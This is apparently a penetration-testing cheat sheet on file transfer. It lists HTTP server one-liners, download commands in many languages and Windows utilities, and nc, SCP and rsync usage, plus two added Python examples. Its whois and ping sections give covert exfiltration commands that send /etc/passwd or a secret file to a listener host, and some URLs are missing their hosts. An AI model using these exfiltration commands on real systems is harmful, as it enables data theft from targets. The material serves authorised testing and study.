Penetration Testing: File Upload and Download
1. Setting up an HTTP server to serve downloads
python2
python -m SimpleHTTPServer 1337
python3
python -m http.server 1337
PHP 5.4+
php -S 0.0.0.0:1337
ruby
ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start'
ruby -run -e httpd . -p 1337
Perl
perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start'
perl -MIO::All -e 'io(":8080")->fork->accept->(sub { $_[0] < io(-x $1 ? "./$1 |" : $1) if /^GET \/(.*) / })'
(The IO::All one-liner listens on 8080 and, for any requested file that is executable, runs it and returns its output instead of its contents; serve only a directory you control.)
busybox httpd
busybox httpd -f -p 8000
apache2
/var/www/html   # web root: put the files to serve here
sudo systemctl start apache2   # start the apache2 service
2. Downloading files
wput
wput dir_name ftp://linuxpig:123456@/
wget
wget /1.rar -O 1.rar
aria2c (must be installed first)
aria2c -o owncloud.zip https:///community/owncloud-9.0.0.tar.bz2
powershell
$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file", "C:$env:HOMEPATH\file")   # PowerShell does not expand %homepath%; use $env:HOMEPATH
VBS script
test.vbs
Set args = Wscript.Arguments
Url = "http://domain/file"
' VBScript does not expand %vars% on its own, so expand the destination path explicitly
Set sh = CreateObject("WScript.Shell")
dest = sh.ExpandEnvironmentStrings("C:%HOMEPATH%\file")
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
    .type = 1 ' binary stream
    .open
    .write xHttp.responseBody
    .savetofile dest, 2 ' 2 = overwrite an existing file
end with
Run: cscript test.vbs
Perl
test.pl
#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");
Run: perl test.pl
Python
test.py
#!/usr/bin/python
# Python 2 (urllib2); on Python 3 use urllib.request.urlopen instead
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'wb')   # binary mode, so binaries are not mangled
localFile.write(u.read())
localFile.close()
Run: python test.py
Ruby
test.rb
#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("") { |http|          # server hostname goes here (missing in the original)
  r = http.get("/file")
  open("save_location", "wb") { |file| file.write(r.body) }
}
Run: ruby test.rb
PHP
test.php
<?php
$url = '/file';              // URL of the file to fetch
$path = '/path/to/file';     // where to save it
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($ch);
curl_close($ch);
file_put_contents($path, $data);
?>
Run: php test.php
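The per-language scripts above all read the whole response into memory and never check what arrived. The following is an added example, not code from the original page: a Python 3 counterpart to the urllib2 script that streams the response to disk in chunks, writes to a .part file and renames it only on success, and rejects a download whose SHA-256 differs from the digest published by the sender. The URL, destination paths and digest are hypothetical, and demo() feeds a constructed in-memory response through the same code path so it runs without a network.

```python
import hashlib
import io
import os
import tempfile
import urllib.request

CHUNK_SIZE = 64 * 1024


def stream_to_file(resp, dest_path, chunk_size=CHUNK_SIZE):
    """Copy a readable byte stream to dest_path; return (bytes_written, sha256_hex)."""
    digest = hashlib.sha256()
    written = 0
    part = dest_path + ".part"
    with open(part, "wb") as out:          # binary mode: no newline translation
        while True:
            block = resp.read(chunk_size)
            if not block:
                break
            digest.update(block)
            out.write(block)
            written += len(block)
    os.replace(part, dest_path)            # rename last, so a half-written target never exists
    return written, digest.hexdigest()


def download_verified(url, dest_path, expected_sha256=None, opener=urllib.request.urlopen):
    """Fetch url to dest_path and check its SHA-256; the file is deleted on mismatch."""
    with opener(url) as resp:
        size, digest = stream_to_file(resp, dest_path)
    if expected_sha256 is not None and digest != expected_sha256.lower():
        os.remove(dest_path)
        raise ValueError(f"sha256 mismatch for {url}: got {digest}, want {expected_sha256}")
    return size, digest


class _FakeResponse(io.BytesIO):
    """Stand-in for the object urlopen() returns, so demo() needs no network (constructed data)."""


def demo():
    """Offline round trip on a constructed payload; returns the values a caller would check."""
    payload = b"pentest-transfer-demo\n" * 5000      # ~110 KB, spans several chunks
    good_hash = hashlib.sha256(payload).hexdigest()

    def fake_urlopen(url):
        return _FakeResponse(payload)

    with tempfile.TemporaryDirectory() as tmp:
        dest = os.path.join(tmp, "file")
        size, digest = download_verified("http://domain/file", dest, good_hash, opener=fake_urlopen)
        on_disk = os.path.getsize(dest)
        # A second fetch against a wrong digest must raise and must not leave the file behind.
        try:
            download_verified("http://domain/file", dest + "2", "00" * 32, opener=fake_urlopen)
            rejected = False
        except ValueError:
            rejected = True
        leftover = os.path.exists(dest + "2")
    return {"size": size, "digest": digest, "expected": good_hash,
            "on_disk": on_disk, "rejected_bad_hash": rejected, "leftover": leftover}


if __name__ == "__main__":
    print(demo())
```

On a real engagement, publish the digest next to the file on the HTTP server from section 1 (for example with sha256sum) and pass it as expected_sha256; a tool that truncates on a dropped connection then fails loudly instead of handing you a corrupt binary.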
nc
attacker (local machine, holds the file):
cat file | nc -l 1234
target (receives the file):
nc host_ip 1234 > file
FTP
ftp 127.0.0.1
(then at the prompts:)
username
password
get file
exit
TFTP
tftp -i host GET location_of_file_on_tftp_server C:%HOMEPATH%\file   # Windows tftp: GET source destination, source is the remote file; -i = binary mode
Bitsadmin
bitsadmin /transfer n http://domain/file C:%HOMEPATH%\file   # the local path must be absolute
Windows file share
net use x: \\127.0.0.1\share /user:userID myPassword
SCP, local to remote
scp file user@:/tmp
SCP, remote to local
scp user@:/tmp file
rsync, copy from a remote rsync server to the local machine
rsync -av root@192.168.78.192::www /databack
rsync, copy from the local machine to a remote rsync server
rsync -av /databack root@192.168.78.192::www
certutil.exe
certutil.exe -urlcache -split -f /file
copy
copy \\IP\ShareName\file.exe file.exe
WHOIS (the whois client sends whatever it is given as the query, so a listener on the attacker's side receives the data)
Receiver, Host B:
nc -vlnp 1337 | sed "s/ //g" | base64 -d
Sender, Host A:
whois -h host_ip -p 1337 `cat /etc/passwd | base64`
(The base64 output is several lines; the shell splits them into separate arguments and whois joins those arguments with spaces into one query, which is why the receiver strips spaces before decoding. whois also terminates the query with CRLF, which base64 -d may complain about after the data has been decoded.)
Multiple files in one go:
First, on the receiver:
ncat -k -l -p 4444 | tee files.b64   # -k keeps listening across the many short whois connections; tee keeps a copy so you can confirm nothing was lost
Next, on the sender:
tar czf - /tmp/* | base64 | xargs -I bits timeout 0.03 whois -h host_ip -p 4444 bits   # one whois query per base64 line; timeout kills whois instead of letting it wait for a reply
Finally, on the receiver:
cat files.b64 | tr -d '\r\n' | base64 -d | tar zxv   # strip the CRLF whois appends to every query, then unpack
Any line that is dropped or arrives out of order corrupts the archive, so compare a checksum of the tarball on both ends before trusting the result.
PING (4 bytes of the file per echo request, carried in the ICMP padding pattern)
Sender:
xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done
Receiver, ping_receiver.py (needs scapy and enough privilege to sniff):
import sys
try:
    from scapy.all import *
except ImportError:
    print("Scapy not found, please install scapy: pip install scapy")
    sys.exit(0)


def process_packet(pkt):
    # Echo requests (type 8) only; the pattern repeats through the payload,
    # so the last 4 bytes are one chunk as sent by xxd -p -c 4
    if pkt.haslayer(ICMP) and pkt[ICMP].type == 8 and pkt.haslayer(Raw):
        data = pkt[Raw].load[-4:]
        print(data.decode("utf-8", errors="replace"), flush=True, end="", sep="")


sniff(iface="eth0", prn=process_packet)
Run: python3 ping_receiver.py
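The receiver above relies on the last 4 bytes of every echo request being exactly one chunk, which only holds while the chunk is 4 bytes long. What follows is an added example, not code from the original page: a pure-Python model of the channel that mirrors `xxd -p -c 4` on the sending side and the "last 4 bytes" rule on the receiving side, so the framing can be checked without root or scapy. It assumes the iputils ping data layout (56 data bytes, the first 8 overwritten by a timestamp, the `-p` pattern repeated through the rest), which is documented in the code and should be confirmed against the ping build in use. The secret is constructed. It shows that a file whose length is not a multiple of 4 comes out garbled at the end, and that padding the file to 4-byte chunks before sending (PKCS#7 style, removed by the receiver) fixes it.

```python
import binascii

DATA_LEN = 56        # iputils default ICMP data size (assumption, see lead-in)
TIMESTAMP_LEN = 8    # the first 8 data bytes carry a struct timeval
CHUNK = 4            # bytes per ping, as in `xxd -p -c 4`


def sender_patterns(secret: bytes, chunk: int = CHUNK):
    """Hex patterns, one per ping, exactly as `xxd -p -c 4 secret.txt` prints them."""
    return [binascii.hexlify(secret[i:i + chunk]).decode()
            for i in range(0, len(secret), chunk)]


def ping_data(pattern_hex: str, data_len: int = DATA_LEN) -> bytes:
    """Model the ICMP data field built by `ping -p PATTERN` (assumed iputils layout)."""
    pattern = binascii.unhexlify(pattern_hex)
    body = bytes(pattern[i % len(pattern)] for i in range(data_len))   # pattern repeated
    return b"\x00" * TIMESTAMP_LEN + body[TIMESTAMP_LEN:]              # timestamp overwrites the head


def receiver_naive(payloads):
    """What ping_receiver.py does: keep the last 4 bytes of every echo request."""
    return b"".join(p[-CHUNK:] for p in payloads)


def pad4(secret: bytes) -> bytes:
    """PKCS#7-style pad so every chunk, including the last, is a full 4 bytes."""
    n = CHUNK - (len(secret) % CHUNK)
    return secret + bytes([n]) * n


def unpad4(data: bytes) -> bytes:
    """Strip the pad; a wrong pad byte means chunks were lost or reordered on the wire."""
    n = data[-1]
    if not 1 <= n <= CHUNK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding: chunks lost or reordered")
    return data[:-n]


def transfer(secret: bytes, padded: bool) -> bytes:
    """Run sender and receiver end to end; return what the receiver reconstructs."""
    wire = pad4(secret) if padded else secret
    payloads = [ping_data(p) for p in sender_patterns(wire)]   # one echo request per chunk
    got = receiver_naive(payloads)
    return unpad4(got) if padded else got


if __name__ == "__main__":
    secret = b"root:x:0:0\n"                       # constructed 11-byte sample
    print("unpadded:", transfer(secret, padded=False))   # tail chunk is 3 bytes: garbled
    print("padded:  ", transfer(secret, padded=True))    # exact copy
```

A second caveat the model does not cover: each `ping -c 1` is a new process, so the ICMP id and sequence number restart every time and cannot be used to order or deduplicate chunks on the receiver; ordering rests entirely on the sender's loop running serially.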